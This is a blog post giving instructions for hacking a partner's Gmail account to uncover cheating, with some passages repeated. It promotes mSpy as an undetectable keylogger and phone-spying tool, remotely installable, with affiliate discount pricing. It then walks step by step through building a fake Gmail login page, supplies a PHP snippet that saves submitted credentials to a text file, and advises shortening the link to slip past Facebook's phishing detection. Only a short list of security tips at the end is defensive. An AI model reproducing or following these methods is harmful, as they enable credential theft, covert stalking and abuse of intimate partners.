Gmail being one of the most widely used email services across the globe, it has also become a favorite place for many to engage in secret relationships and exchange cheating messages.Therefore, in order to reveal the secret, it becomes inevitable for people to hack the Gmail account of their loved ones.Today, most websites on the Internet give out false or outdated password hacking methods that completely mislead the readers. I have also seen a few top ranking websites making false promises to crack any Gmail password and urge users to take-up surveys.
Remember, this is just a honeypot setup by the website owner only to earn money where no Gmail password will be delivered to users upon survey completion. However, on this website we strive hard to present readers with true and accurate information that actually work. With many years of my experience in the field of information security, I can tell you that the following are the only two ways to hack Gmail password.Now the time come to know how to Hack Gmail account 2015
Remember, this is just a honeypot setup by the website owner only to earn money where no Gmail password will be delivered to users upon survey completion. However, on this website we strive hard to present readers with true and accurate information that actually work. With many years of my experience in the field of information security, I can tell you that the following are the only two ways to hack Gmail password.Now the time come to know how to Hack Gmail account 2015
Must read:
1. Mspy App : Easiest Way To Hack Gmail Password
Mspy is by far the easiest way to gain access to any Gmail account. Keylogging involves the use of a small software program called the keylogger. This keylogger when installed on a given computer will capture each and every keystroke typed on the keyboard including all types of passwords.
Does A Mspy Require Any Special Knowledge?
No, absolutely not! Mspy are designed in such a way that even the first time users also find it easy to install and control. Anyone with a basic knowledge of computer can use it with ease to gmail access to any Gmail account.Is It Possible To Detect A Mspy?
Right after the installation process is completed, the Mspy goes completely hidden and continues to work in the background. Hence, it is impossible for the users of the computer to know about its presence.
What If I Do Not Have Physical Access To The Target Computer?
Well, you need not worry as I am going to suggest one of the best keylogger program that supports installation on a local computer as well as a remote computer. I recommend the Mspy keylogger as the best to gain access to Gmail account:
Top Features of Mspy software:
What If I Do Not Have Physical Access To The Target Computer?
Well, you need not worry as I am going to suggest one of the best keylogger program that supports installation on a local computer as well as a remote computer. I recommend the Mspy keylogger as the best to gain access to Gmail account:
Top Features of Mspy software:
1.) Remote And Local Installation
2.) The product supports installation on remote as well as a local computer.
3.) Extremely Easy To Install
4.) MSpy is very small in size and can be installed with just a click of a button.
5.) Never Get Caught!
6.) This product runs in a total stealth mode so that you need not worry about being caught or traced back.
7.) Acess Any Password!
8.) This product can be used to obtain Gmail or any other online password.
9.) Works on Windows And MAC
10.) Fully compatible with Windows XP/Vista/7/8 (32 and 64-bit) and Mac.
2.) The product supports installation on remote as well as a local computer.
3.) Extremely Easy To Install
4.) MSpy is very small in size and can be installed with just a click of a button.
5.) Never Get Caught!
6.) This product runs in a total stealth mode so that you need not worry about being caught or traced back.
7.) Acess Any Password!
8.) This product can be used to obtain Gmail or any other online password.
9.) Works on Windows And MAC
10.) Fully compatible with Windows XP/Vista/7/8 (32 and 64-bit) and Mac.
You get a detailed step-by-step instruction and technical support after your purchase. So, go grab MSpy now and expose the truth!
Special Offer For Buying Mspy Software For Windows And Mac
For a Extratipstricks user ,i will provide you an special offer for Mspy .I think this is must app for any Android,apple ios,blackberry users who want to expose someone's fraud,many of my readers ask me for discount of Mspy software so here now i will give you an extra bonus ,purchase Mspy today ( offer till 30 Novmber 2016) and you just need to pay only $29.99 for one month or $39.99 for 3 months or $69.99 for one year. I think buying mspy for 12 month is a great deal for evreyone thus So go and grab this offer and save your huge money.Buy mSpy software– for Windows and mac
What About Mobile Devices?
To gain access to Gmail account accessed from cell phones or mobile devices, there is a mobile version of the same program called mSpy which you can download from the following link:- Supported Devices: Android, Windows Mobile, BlackBerry, iPhone, Apple iPads and Android tablets.
Feature Of Mspy App For Mobile Users:
1.) SMS Logging – this feature simply Records both incoming & outgoing SMS,whatsapp,facebook,gmail,twitter etc.2.) Call Interception – it give you fully freedom for Listen to the actual calls LIVE on the target cell phone
3.) SIM Change Notification –when victim change their sim card it give you notification via SMS when the target cell phone changes it’s SIM
4.) Remote Control – Send secret SMS to the target phone to control all functions
5.) Environment Listening - Make a spy call to the target cell phone running SPY PHONE and listen in to the phone’s surroundings.
6.) SIM Change Notification – Get instant notification via SMS when the target cell phone changes it’s SIM
7.) Spy from any location across the world
8.) feel free use it because it is FUD( Fully undetectable ) or we can say 100% Undetectable.
Special Offer Of Mspy App For IPhone,Android,Blackberry User
For a ExtraTipsTricks user ,i will provide you an special offer for Mspy .I think this is must app for any Android,apple,blackberry users who want to expose someone's fraud.You can check compatibility of your device by going to this link ,many of my readers ask me for discount of Mspy software so here now i will give you an extra bonus ,purchase Mspy today ( offer till 30 Novmber 2016) and it have 3 plan for mobile users (Basic,premium,family kit) and you just need to pay only $8.33 per one month if you choosing a basic plan or $16.65 per months if you are choosing premium plan of Mspy. I think buying Mspy for 12 month is a great deal for everyone also above given price per month is only for those people who purchase Mspy for 12 months thus So go and grab this offer and save your huge money.2. Phishing: Difficult Way (For Advanced Users Only)
Phishing is an old method of e-mail fraud that is used to gather personal and financial information from the recipients. phishing is the act of attempting to acquire information such as usernames, passwords, and credit card details (and sometimes, indirectly, money) by masquerading as a trustworthy entity in an electronic communication.Phishing is an example of a social engineering technique.Step By Step Guide To Hack Gmail Account Using Phishing
Step:1.) First of all Go to the Gmail.comStep:2) And then right click on the blank area, you will see the option view source page,simply click on that.
Step:3) Now a pop up window will be open which contain a source code of Gmail page, And Copy all the code using ctrl+c
Step:4) Now open the notepad and past all code here which copy in step 3
Step:5) Now press CTRL+F,and type ACTION.(see bellow picture)
Step:6) You will have to search action again and again till you get like bellow code
action= ""

Step:7) After that delete all the text written in blue color and instead of it write hack.php.then it will look like.
action="hack.php"Step:8) Now save it on your desktop with the name index.htm,not index.html,remember.
Step:9) Now your phishing page is ready.
Must read:
header ('Location:');
$handle = fopen("usernames.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
fwrite($handle, "\r\n");
Note: I use hack.php in step 7 that's why we need to use same name in step 9
Step:10) You have successfully created two files
Hack .php,
Step:11) now you need to upload these two files in free web hosting site some free web hosting site given bellow
I prefer because it is easy to use so here i am going to use in next steps
Step:12) First of all go to and click on register button which is located in upper side bar.
Step:13) Now simply fill all necessary information in registration form
Step:14) When your account completely setup simply log in with your username and password
Step:15) When you open your account you see control panel ,now click on file manager.
Step:16) Now file manager will open and you need to upload index.htm and hack.php file ,simply click on upload files button and upload both files there after uploading it look like bellow picture.
Step:17) now click on index.htm file you see fake gmail page simply copy the url from your web browser url address bar .your link look like bellow : now you almost done simply send this link to your victim or friends .
step:19) when victim open that link he see fake gmail page which look like real and enter there username and password and hit login his password send to your my3gb account.
Step:20) for seeing password simply go to >>control panel >>file manager,and here you see new file with name usernames.txt .open it and see the password.
you are not able to send your phishing link to friends in Facebook because Facebook detect it and give warning to delete that link.If you want to send your link via Facebook or other social networking site then you need to use url shortening I prefer to use www.tinyurl.combecause it is easy to use and Facebook security not detect it easily.if tinyurl not allowed phishing link then try another websites. if you don't know how to short your link for Facebook follow bellow steps
- 1) first of all go to
- 2) past your phishing URL in the box and hit make tiny URL button.
- 3) after that you get your short link simply send that link to your friends.
How To Secure Yourself From Hackers
2) Never give out your username or password to anyone, including websites with suspicious links and layouts. Giving your passwords freely could jeopardize the security of your personal information on Facebook.
3) Log in only See url correctly
4) Update your browser to its latest version to ensure your browser’s security is up to date so it would detect and alert you with a warning when you are navigating to a suspected phishing site.
5) Create Strong Password
6.) Activate ‘two way varification '
8. )Activate Private Browsing
If you are using the Safari Browser on Mac, activate Private Browsing from the menu with Safari > Private Browing.
For Firefox, go to Tools > Start Private Browsing.
If you are using Chrome, there’s an option to browse using the Incognito window, it’s a version of Chrome window where all browsing activity will not be logged in. To open this window, go to File > New Incognito Window.
9.) Don’t ‘Keep Me sign In’
10. ) Avoid Spam Links
11) Sign Out after use
That's it friends
If you faced any problem feel free ask me via comment box.
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